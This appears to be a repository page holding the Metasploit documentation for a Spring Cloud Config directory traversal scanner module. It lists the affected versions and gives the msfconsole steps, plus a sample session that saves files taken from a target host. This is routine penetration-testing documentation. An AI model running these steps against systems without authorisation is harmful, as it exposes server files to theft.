adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
T
h00die ca59b06fd3 module doc standardizations
2020-01-20 21:26:59 -05:00

30 lines
1.0 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring Cloud Config listens by default on port 8888.
* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
## Verification Steps
1. `./msfconsole`
2. `use auxiliary/scanner/http/springcloud_traversal`
3. `set rhosts <rhost>`
4. `run`
## Scenarios
### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
```
msf > use auxiliary/scanner/http/springcloud_traversal
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
RHOSTS => 192.168.1.132
msf auxiliary(scanner/http/springcloud_traversal) > run
[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/springcloud_traversal) >
```
Reference in New Issue View Git Blame Copy Permalink